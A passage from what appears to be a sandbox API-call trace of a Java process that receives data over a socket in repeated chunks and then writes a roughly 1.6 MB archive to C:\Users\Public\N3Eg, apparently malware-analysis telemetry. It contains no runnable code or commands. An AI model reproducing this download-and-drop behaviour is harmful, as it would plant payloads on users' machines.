argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.522] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.523] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.523] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.523] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.524] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.524] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.524] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.525] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.525] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.526] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.526] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.527] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.527] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.528] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.528] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.529] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.529] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.530] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.530] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.530] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.531] recv (in: s=0x290, buf=0x15063400, len=8192, flags=0 | out: buf=0x15063400*) returned 8192 [0019.534] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.534] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.535] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.535] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.536] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.536] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.536] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.536] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.537] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.537] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.538] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.538] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.538] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.538] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.539] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.539] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.540] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.540] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.541] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.541] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.541] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.541] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.542] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.542] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.542] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.543] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.543] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.543] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.544] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.544] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.544] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.544] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.545] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.545] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.546] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.546] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.546] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.546] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.547] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.547] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.548] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.548] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.548] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.548] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.549] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.549] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.549] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.550] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.550] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.550] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.551] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.551] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.551] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.551] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.552] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.552] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.553] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.553] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.553] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.553] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.554] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.554] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.555] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.555] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.555] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.555] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.556] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.556] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.556] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.557] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.557] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.557] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.558] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.558] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.558] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf114 | out: argp=0x4bf114) returned 0 [0019.558] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.560] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.560] recv (in: s=0x290, buf=0x15063690, len=8192, flags=0 | out: buf=0x15063690*) returned 8192 [0019.562] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.562] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.562] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.562] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.563] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.563] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.563] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.563] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.564] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.564] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.564] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.564] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.565] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.565] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.565] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.565] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.566] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.566] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.566] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.566] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.566] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.567] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.567] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.567] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.567] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.567] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 8192 [0019.568] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.568] recv (in: s=0x290, buf=0x150637a0, len=8192, flags=0 | out: buf=0x150637a0*) returned 7142 [0019.568] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.569] strlen (_Str="sun/net/www/http/KeepAliveCache$1.class") returned 0x27 [0019.569] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388763, lpNewFilePointer=0x0, dwMoveMethod=0x4be8b4 | out: lpNewFilePointer=0x0) returned 1 [0019.569] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be884, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be884*=0xa0, lpOverlapped=0x0) returned 1 [0019.569] strlen (_Str="sun/net/www/http/KeepAliveCache$1.class") returned 0x27 [0019.569] strcpy (in: _Dest=0x4be9b8, _Source="sun/net/www/http/KeepAliveCache$1.class" | out: _Dest="sun/net/www/http/KeepAliveCache$1.class") returned="sun/net/www/http/KeepAliveCache$1.class" [0019.569] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252e438, lpNewFilePointer=0x0, dwMoveMethod=0x4be4b8 | out: lpNewFilePointer=0x0) returned 1 [0019.569] ReadFile (in: hFile=0xd4, lpBuffer=0x4be4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be488, lpOverlapped=0x0 | out: lpBuffer=0x4be4f0*, lpNumberOfBytesRead=0x4be488*=0x1e, lpOverlapped=0x0) returned 1 [0019.569] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252e47d, lpNewFilePointer=0x0, dwMoveMethod=0x4be4f4 | out: lpNewFilePointer=0x0) returned 1 [0019.569] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x5b3, lpNumberOfBytesRead=0x4be4c4, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be4c4*=0x5b3, lpOverlapped=0x0) returned 1 [0019.585] strlen (_Str="sun/net/www/http/ClientVector.class") returned 0x23 [0019.585] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33884cb, lpNewFilePointer=0x0, dwMoveMethod=0x4be8b4 | out: lpNewFilePointer=0x0) returned 1 [0019.585] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be884, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be884*=0xa0, lpOverlapped=0x0) returned 1 [0019.585] strlen (_Str="sun/net/www/http/ClientVector.class") returned 0x23 [0019.585] strcpy (in: _Dest=0x4be9b8, _Source="sun/net/www/http/ClientVector.class" | out: _Dest="sun/net/www/http/ClientVector.class") returned="sun/net/www/http/ClientVector.class" [0019.585] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252823f, lpNewFilePointer=0x0, dwMoveMethod=0x4be4b8 | out: lpNewFilePointer=0x0) returned 1 [0019.586] ReadFile (in: hFile=0xd4, lpBuffer=0x4be4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be488, lpOverlapped=0x0 | out: lpBuffer=0x4be4f0*, lpNumberOfBytesRead=0x4be488*=0x1e, lpOverlapped=0x0) returned 1 [0019.586] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2528280, lpNewFilePointer=0x0, dwMoveMethod=0x4be4f4 | out: lpNewFilePointer=0x0) returned 1 [0019.586] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x574, lpNumberOfBytesRead=0x4be4c4, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be4c4*=0x574, lpOverlapped=0x0) returned 1 [0019.587] strlen (_Str="sun/net/www/http/KeepAliveEntry.class") returned 0x25 [0019.587] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388865, lpNewFilePointer=0x0, dwMoveMethod=0x4be878 | out: lpNewFilePointer=0x0) returned 1 [0019.587] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be848, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be848*=0xa0, lpOverlapped=0x0) returned 1 [0019.587] strlen (_Str="sun/net/www/http/KeepAliveEntry.class") returned 0x25 [0019.587] strcpy (in: _Dest=0x4be97c, _Source="sun/net/www/http/KeepAliveEntry.class" | out: _Dest="sun/net/www/http/KeepAliveEntry.class") returned="sun/net/www/http/KeepAliveEntry.class" [0019.587] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252fd55, lpNewFilePointer=0x0, dwMoveMethod=0x4be47c | out: lpNewFilePointer=0x0) returned 1 [0019.587] ReadFile (in: hFile=0xd4, lpBuffer=0x4be4b4, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be44c, lpOverlapped=0x0 | out: lpBuffer=0x4be4b4*, lpNumberOfBytesRead=0x4be44c*=0x1e, lpOverlapped=0x0) returned 1 [0019.587] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252fd98, lpNewFilePointer=0x0, dwMoveMethod=0x4be4b8 | out: lpNewFilePointer=0x0) returned 1 [0019.587] ReadFile (in: hFile=0xd4, lpBuffer=0xaa41a8, nNumberOfBytesToRead=0x11d, lpNumberOfBytesRead=0x4be488, lpOverlapped=0x0 | out: lpBuffer=0xaa41a8*, lpNumberOfBytesRead=0x4be488*=0x11d, lpOverlapped=0x0) returned 1 [0019.594] strlen (_Str="java/io/FileOutputStream") returned 0x18 [0019.595] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg1.zip") returned 0x1e [0019.595] wcscpy (in: _Dest=0x1501bfc0, _Source="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg1.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" [0019.595] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg1.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg1.zip"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0019.617] WriteFile (in: hFile=0x2b0, lpBuffer=0x15980020*, nNumberOfBytesToWrite=0x195aa8, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0 | out: lpBuffer=0x15980020*, lpNumberOfBytesWritten=0x4bd360, lpOverlapped=0x0) returned 1 [0019.680] CloseHandle (hObject=0x2b0) returned 1 [0019.719] send (in: s=0x290, buf=0x4be8f4*, len=182, flags=0 | out: buf=0x4be8f4*) returned 182 [0019.733] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.744] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.744] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.745] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.745] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.746] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.746] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.747] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.747] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.747] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.747] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.748] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.748] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.749] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.749] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.749] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.749] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.750] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.750] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.751] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.751] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.752] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.752] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.752] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.752] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.753] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.753] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.753] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.753] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.754] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.754] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.754] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.754] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.754] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.755] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.757] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.757] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.758] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.758] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.758] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.758] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.759] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.759] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.759] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.759] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.760] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.760] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.760] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.760] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.760] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.761] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.761] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.761] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.761] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.761] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.762] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.762] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.762] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.762] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.763] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.763] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.763] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.763] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.764] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.764] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.764] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.764] recv (in: s=0x290, buf=0x150667b0, len=8192, flags=0 | out: buf=0x150667b0*) returned 8192 [0019.774] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.774] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.775] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.775] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.775] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: argp=0x4bf124) returned 0 [0019.775] recv (in: s=0x290, buf=0x15066fc0, len=8192, flags=0 | out: buf=0x15066fc0*) returned 8192 [0019.776] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf124 | out: 